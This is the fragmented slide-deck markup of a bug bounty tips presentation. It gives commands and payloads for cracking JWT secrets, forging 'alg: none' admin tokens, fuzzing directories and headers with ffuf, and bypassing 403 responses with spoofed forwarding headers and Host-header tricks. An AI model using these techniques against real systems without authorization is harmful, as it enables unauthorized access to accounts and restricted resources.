            <a:ext cx="659974" cy="50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49" name="Google Shape;949;p9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9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51" name="Google Shape;951;p9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Do Brute Forcing The Secret By Using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jwt_tool.py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952" name="Google Shape;952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9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 Get JWT Token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Open Your Terminal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Write This Command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     python2.7 jwt_tool.py eyJ---.eyJ--.1rt--- wordlist.txt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54" name="Google Shape;954;p9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55" name="Google Shape;955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98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57" name="Google Shape;957;p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25" y="3523363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9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50" y="39341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98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960" name="Google Shape;960;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="312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961" name="Google Shape;961;p9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4538" y="2582250"/>
            <a:ext cx="659974" cy="50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Add</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tab </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instead</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Of  The Space That In The Host Header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e.g.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Host:	comapny.com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59" name="Google Shape;259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/authorization-response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Host:		www.company.com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1" name="Google Shape;261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5" name="Google Shape;26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9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67" name="Google Shape;967;p9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9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69" name="Google Shape;969;p9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Crack JWT To Get The Secret By Using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jwtcrack</a:t>
            </a:r>
            <a:endParaRPr b="1"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70" name="Google Shape;970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9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 Get JWT Token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Open Your Terminal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Write This Commands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     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./jwtcrack </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eyJ---.eyJ--.1rt---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72" name="Google Shape;972;p9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73" name="Google Shape;973;p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99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75" name="Google Shape;975;p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25" y="3523363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99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="312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977" name="Google Shape;977;p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4538" y="2582250"/>
            <a:ext cx="659974" cy="50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100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-43050" y="4648524"/>
            <a:ext cx="9245400" cy="526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  Alexander Knorr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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBounty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1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBountyTip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984" name="Google Shape;984;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3063350" y="4715424"/>
            <a:ext cx="3128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985" name="Google Shape;985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3750" y="4729087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01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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-random-agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> " U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>se A Random User-Agent		" -o out.txt " Save Results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91" name="Google Shape;991;p101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gau -random-agent www.company.com -o out.txt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92" name="Google Shape;992;p10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Fetch Known URLs From AlienVault's , Wayback Machine And Common Crawl</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> By Using Tools e.g.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getallurls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waybackurls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993" name="Google Shape;993;p101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399450" y="44695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-replay-proxy URL " Replay Matched Requests Using This Proxy        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" | tee -a out.txt " Save Results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94" name="Google Shape;994;p101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399550" y="3802200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waybackurls www.company.com | tee -a out.txt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95" name="Google Shape;995;p10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6" name="Google Shape;996;p10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10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98" name="Google Shape;998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2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"company.com" authorization-response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04" name="Google Shape;1004;p102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org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>company</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response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05" name="Google Shape;1005;p102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399450" y="44086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python3 github-endpoints.py -d www.company.com -s -r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06" name="Google Shape;1006;p102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="16878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Try To Search On </a:t>
            </a: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b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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github-endpoints.py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1007" name="Google Shape;1007;p10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8" name="Google Shape;1008;p10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10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010" name="Google Shape;1010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10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12" name="Google Shape;1012;p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50" y="35143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03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site:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>company.com inurl:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response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18" name="Google Shape;1018;p103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site:company.com authorization-response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19" name="Google Shape;1019;p103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inurl:/authorization-response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20" name="Google Shape;1020;p103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="16878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Try To Search On </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="48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</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1021" name="Google Shape;1021;p10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22" name="Google Shape;1022;p10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0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024" name="Google Shape;1024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103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26" name="Google Shape;1026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50" y="35143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04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-w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wordlist.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> " </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wordlist file path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32" name="Google Shape;1032;p104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-u URL " </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target URL AND " FUZZ "  keyword Used To Append Line From Wordlist.txt To URL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33" name="Google Shape;1033;p104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ffuf -w wordlist.txt -u https://www.company.com/FUZZ -fc 401,403,404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                     -replay-proxy http://127.0.0.1:8081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34" name="Google Shape;1034;p10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Do Directory Brute Forcing If You Got </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>403 Forbidden OR 401 Unauthorized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By Using Tools e.g.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ffuf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035" name="Google Shape;1035;p104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-fc Status Code " </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Filter HTTP Status Codes From Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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36" name="Google Shape;1036;p104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399450" y="44695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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-replay-proxy URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> " </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Replay Matched Requests Using This Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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37" name="Google Shape;1037;p10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8" name="Google Shape;1038;p10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0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040" name="Google Shape;1040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05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-w headers.txt " Wordlist file path	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"     -u URL " Target URL     " -H " Header: Value " " append Header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46" name="Google Shape;1046;p105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-H " FUZZ: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eyJ----------.eyJ------------.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> " "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> keyword Used To Append Line From headers.txt To URL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47" name="Google Shape;1047;p105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f</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fuf -w </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF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headers.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -u https://www.company.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -H </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"FUZZ: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                     eyJ----------------.eyJ----------------."</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFE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-fc 401,403 -replay-proxy http://127.0.0.1:8081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48" name="Google Shape;1048;p10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Do </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Headers Brute Forcing With Fake JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. base64UrlEncode(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{"alg": "none","typ": "JWT"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}) + "." + base64UrlEncode(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{"roles": "admin"}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+ "." By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ffuf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049" name="Google Shape;1049;p105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-fc Status Code " Filter HTTP Status Codes From Response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50" name="Google Shape;1050;p105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399450" y="44695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-replay-proxy URL " Replay Matched Requests Using This Proxy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51" name="Google Shape;1051;p10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2" name="Google Shape;1052;p10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0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054" name="Google Shape;1054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Google Shape;1059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7600" y="-50225"/>
            <a:ext cx="9325723" cy="52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106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58375" y="4634190"/>
            <a:ext cx="9016200" cy="540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  Hack3rScr0lls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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBounty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1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBountyTip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061" name="Google Shape;1061;p106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3070525" y="4691325"/>
            <a:ext cx="3128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1062" name="Google Shape;1062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0925" y="4691305"/>
            <a:ext cx="503200" cy="42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0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Got Blocked While Doing Brute Force , Try To Set These Headers e.g.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X-Forwarded: 127.0.0.1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etc , Then Try To Use VPN To Change Your IP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068" name="Google Shape;1068;p10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GET</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/authorization-response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</a:rPr>
              <a:t>X-Forwarded: 127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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</a:rPr>
              <a:t>X-Forwarded-By: 127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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</a:rPr>
              <a:t>X-Forwarded-For: 127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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</a:rPr>
              <a:t>X-Forwarded-For-Original: 127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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</a:rPr>
              <a:t>X-Forwarder-For: 127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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</a:rPr>
              <a:t>X-Forward-For: 127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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</a:rPr>
              <a:t>Forwarded: 127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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</a:rPr>
              <a:t>Forwarded-For: 127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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</a:rPr>
              <a:t>Forwarded-For-Ip: 127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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User-Agent: Mozilla/5.0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1069" name="Google Shape;1069;p10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0" name="Google Shape;1070;p10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0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072" name="Google Shape;107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10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74" name="Google Shape;1074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Google Shape;1079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775" y="-57400"/>
            <a:ext cx="9368775" cy="52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108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58375" y="4641364"/>
            <a:ext cx="9016200" cy="533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  Hack3rScr0lls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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBounty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1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBountyTip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1081" name="Google Shape;1081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925" y="4697722"/>
            <a:ext cx="503200" cy="420673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108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3070525" y="4691325"/>
            <a:ext cx="3128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Add </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/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: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\x00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\x20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\x09 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\xad</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> After Value Of</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The Host Header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e.g.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Host: comapny.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-file.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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71" name="Google Shape;271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/authorization-response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Host:	 www.company.com sensitive-file.txt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72" name="Google Shape;272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3" name="Google Shape;273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75" name="Google Shape;2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7" name="Google Shape;27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09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09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9" name="Google Shape;1089;p109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90" name="Google Shape;1090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109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09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109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Do Brute Force On The PORT In The Host Header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e.g.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Host: comapny.com:FUZZ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass 403 Forbidden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83" name="Google Shape;283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/authorization-response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Host: www.company.com:FUZZ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84" name="Google Shape;284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5" name="Google Shape;285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Add</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Headers e.g. X-Original-URL: /</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> X-Override-URL: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/authorization-response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X-Rewrite-URL: /authorization-response </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass It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95" name="Google Shape;295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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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X-Original-URL: /authorization-response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96" name="Google Shape;296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7" name="Google Shape;297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1" name="Google Shape;30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8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50" y="351437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50" y="39341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8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